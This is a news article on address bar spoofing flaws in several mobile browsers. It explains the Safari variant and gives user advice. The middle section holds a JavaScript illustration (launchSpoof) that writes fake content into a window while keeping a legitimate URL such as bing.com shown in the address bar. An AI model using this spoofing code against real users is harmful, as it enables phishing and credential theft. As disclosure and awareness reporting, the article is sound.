Address Bar Spoofing Vulnerabilities In Multiple Mobile Browsers

Google's Vulnerability Reward Program (VRP) treats the address bar as the most reliable security indicator for validating the authenticity of a website; the recent discovery of address bar spoofing vulnerabilities affecting multiple mobile browsers shows that even this indicator can be forged.

According to cybersecurity researcher Rafay Baloch, the address bar spoofing vulnerabilities affect multiple mobile browsers, including Apple Safari, Opera Touch, Yandex Browser, UCWeb, Bolt Browser, and RITS Browser, and the flaw leaves the door open for spear-phishing and malware attacks.

While UCWeb and Bolt have yet to release patches for their respective browsers, Opera is expected to release a fix for Opera Touch on November 11, 2020.

How the Address Bar Spoofing Vulnerabilities Affect Multiple Mobile Browsers

The address bar spoofing vulnerabilities stem from malicious JavaScript on an attacker-controlled or compromised website that forces the browser to update the address bar while the page is still loading, so that the bar shows a destination URL of the attacker's choice rather than the address of the content actually being displayed.

The Safari variant arises because the browser keeps the requested URL in the address bar when a page is requested over an arbitrary port; a setInterval function that reloads bing.com:8080 every 2 milliseconds keeps that navigation pending, so users cannot recognize that what they are looking at is not the original site but content served under the spoofed URL.

Similar issues have also been found in several other major browsers and will be made public once the coordinated disclosure timeline has elapsed. What makes the Safari vulnerability more pronounced is that the browser by default does not reveal the port number in the URL unless the address bar is focused, so the unusual port that would give the trick away stays hidden.
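The following is an added illustration of the pattern the two paragraphs above describe; it is not Rafay Baloch's proof of concept and not code from any browser vendor. The host bing.com, the port 8080 and the 2 millisecond interval are taken from the text. The function names, the displayedOrigin helper that models Safari hiding the port until the bar is focused, and the assumption that the opened window is still the initial about:blank document (same-origin with the opener while the navigation to a dead port is pending) are assumptions of this example. launchSpoof needs a browser and a user gesture; the two helpers run anywhere, including Node.

```javascript
// Added illustration of the address bar spoofing pattern described in the
// article. This is not Rafay Baloch's proof of concept; host, port and the
// 2 ms interval come from the text, everything else is an assumption.

// Build the URL the attacker navigates to: the legitimate host on a port
// that does not answer. The request never completes, but the browser has
// already placed this URL in the address bar.
function spoofTarget(host, port) {
  const u = new URL("https://" + host + "/");
  u.port = String(port);
  return u.href; // "https://bing.com:8080/" for the values in the text
}

// Model of what the user sees in the bar. Per the article, Safari shows
// only scheme and host until the bar is focused, so the odd port that
// would give the game away stays hidden. Assumed helper, not a browser API.
function displayedOrigin(href, barFocused) {
  const u = new URL(href);
  return barFocused ? u.origin : u.protocol + "//" + u.hostname;
}

// Browser-only part, to be called from a user gesture on the attacker's
// page (for example a button's onclick). Assumes the opened window is still
// the initial about:blank document, which is same-origin with the opener
// while the navigation to the dead port is pending.
function launchSpoof(host, port, fakeHtml, intervalMs = 2) {
  const target = spoofTarget(host, port);
  const w = window.open(target, "_blank");
  if (!w) return null; // popup blocked: nothing to spoof

  const timer = setInterval(function () {
    try {
      // Paint attacker-controlled content into the still-blank window...
      w.document.open();
      w.document.write(fakeHtml);
      w.document.close();
      // ...and re-issue the navigation so the bar keeps showing `target`.
      w.location.assign(target);
    } catch (e) {
      // A patched browser commits a real (cross-origin) document or drops
      // the pending URL; either way the race is lost, so stop the timer.
      clearInterval(timer);
    }
  }, intervalMs);
  return timer;
}
```

The defensive point is in displayedOrigin: the same URL that renders as https://bing.com in an unfocused Safari bar renders as https://bing.com:8080 once the bar is focused, which is why tapping the address bar before entering credentials is a cheap check against this class of spoof.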

How Web Users Can Stay Safe from Such Address Bar Spoofing Vulnerabilities

With the address bar seemingly pointing to a trusted website and giving no indication of forgery, it becomes easy to coax users into disclosing personal information or into downloading malware; because the trick exploits a specific flaw in the browser rather than a lookalike domain, it also evades several anti-phishing solutions.

Web users are therefore urged to stay aware of browser-based vulnerabilities such as address bar spoofing, which can raise the success rate of spear-phishing attacks and make them considerably more dangerous; keeping the browser updated and focusing the address bar to reveal the full URL, including any port number, before entering credentials are practical checks against this class of flaw.